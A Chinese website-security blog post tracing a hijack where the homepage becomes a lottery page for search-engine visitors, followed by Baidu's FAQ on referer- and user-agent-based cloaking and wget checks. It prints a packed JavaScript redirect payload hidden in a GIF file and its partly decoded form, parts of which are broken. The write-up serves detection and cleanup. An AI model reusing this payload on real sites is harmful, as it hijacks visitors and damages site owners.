主页搜索结果跳转到其他网站--网站安全

案例：XX主页从搜索引擎打开会变为六合彩，直接输入网址一切正常，什么原理呢

分析原因：1.机房arp攻击2,。被插入恶意代码

检测步骤：

1.查找安全软件日志，定位作乱的mac地址，查阅ip/mac表，检查对应主机（发现是一台曾经被黑的主机时间大概2011年1到2月份）

2.查找恶意代码，使用dreamever的查找功能，全站检索关键词无果，怀疑js或者css引用，再次查看无果。

3.最笨的方法开始，用文本编辑器Editplus挨个点击图片jpg、gif，swf等文件，查到一个恶意图片文件。

============================恶意文件head.gif================================================

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l="";k d=9.m;n((d.2("%1%p%o%1%j%g%1%c%f")>0)||(d.2("8=%7%6%a%3%4%5")>0)||(d.2("8=%3%q%r%A%7%6%a%3%4%5")>0)){9.s("<\\/b>")}B{i.C.h="e.E"}',41,41,'|E5|indexOf|CF|B2|CA|F9|C1|wd|document|BA|script|BD||index|A9|88|href|window|90|var|GIF89a|referrer|if|AD|85|E3|B8|writeln|pic|src|http|89614|www|com|bby|DB|else|location|gif|aspx'.split('|'),0,{}))

============================================================================================

看到eval(function(p,a,c,k,e,d)

推测javascript语句，使用google，而不是百度，很纠结（百度里谷歌一下）

找到一种解决加密的方式

新建一个html文档

==================================================

name=tttstyle='width:100%;height:300' >
======================================================================================

红色代码部分return p修改为xxx.value=p ，xxx这里随便输入一个ttt，和标题对应

浏览器打开

============================================================================================

GIF89a="";var d=document.referrer;if((d.indexOf("%E5%85%AD%E5%90%88%E5%BD%A9")>0)||(d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){document.writeln("

 

===============================

百度给出的解释

我的网站被标记风险标志，但标题和描述都与我网站无关，是不是百度弄错了？

 

A:

百度搜索结果中展现的内容，是对所抓取页面的真实反映。若出现了您所述的情况，并非是百度搜索的问题，而是您的网站遭到黑客篡改所致。黑客通过侵入您的网站，添加针对百度蜘蛛抓取的页面，这样百度收录到页面便与您网站的内容毫不相关，因而在搜索结果中显示的标题和摘要内容自然也与您的网站无关。

此类被黑是针对网站UA（user-agent）进行的，在此为您提供两条检查的方法以供参考：
1）linux 下可使用wget命令：
wget http://xxxxxx/xx -UBaiduspider -O baiduUA.html
wget http://xxxxxx/xx -O nullUA.html
打开文件baiduUA.html，nullUA.html，对比内容是否一致，若不一致证明服务器对不同UA返回不同结果。如果您没有设置服务器，那么您的网站就是被黑了。
2）使用firefox 插件 user agent switcher，设置不同的user agent，然后用firefox打开您的首页，如果页面不一致且您并没有设置服务器，那么您的网站就是被黑了。
请您务必及时检查并修复您的网站，或寻求技术人员的帮助，以减小由此带来的损失。

Q:

为什么我在浏览我的网站时没有发现问题，在百度搜索中却会被标记风险标志？

 

A:

通过其他途径浏览网站没有发现问题，并不代表网站没有被黑。由于百度搜索是影响力较大的搜索引擎，目前国内站点的首页被黑，一半以上是仅针对百度搜索的。也就是说，只有通过百度搜索结果点击进入网站时，被黑的情况才会展现出来。

具体来讲，黑客通过侵入您的网站，添加针对来自百度搜索用户才会展现的页面，这样一来用户再通过百度搜索进入您的网站时展现的便是黑客制造的页面，而直接访问和通过其他搜索引擎的访问时，这些被黑页面是不会展现出来的。这对您的网站和网站用户的伤害极大，请您及时对网站进行检查并修复。
对于此类针对网站referer功能的黑客行为，我们提供两条具体检查方法以供您或者网站技术人员参考：
1）linux 下可使用wget命令：
wget http://xxxxxx/xx --referer=http://www.baidu.com/s?wd=abc -O baiduREF.html
wget http://xxxxxx/xx -O nullREF.html
打开文件baiduREF.html，nullREF.html，对比内容是否一致，若不一致证明服务器对不同referer返回不同结果。如果您没有设置服务器，那么您的网站就是被黑了。
2）使用firefox 插件 RefControl，设置不同的referer，然后用firefox打开您的首页，如果不同referer打开的页面不一致且您并没有设置服务器，那么您的网站就是被黑了。

Q:

我的网站提示存在风险，如何快速检查出网站存在的异常呢？

 

A:

site语法检索是最常用的检查方式，即在搜索框输入"site:您的网站域名"（例：site:baidu.com），查看网站收录情况，是否出现页面数量暴增，或目录异常的现象，并观察搜索结果中的标题和摘要内容是否与网站内容相关。也可通过检索"site:您的网站域名 被黑热门词"的形式来筛选出被黑内容（例：site:baidu.com 六合彩）。被黑热门词一般集中在游戏类和色情类，如"六合彩"、"qq刷钻"、"成人电影"等。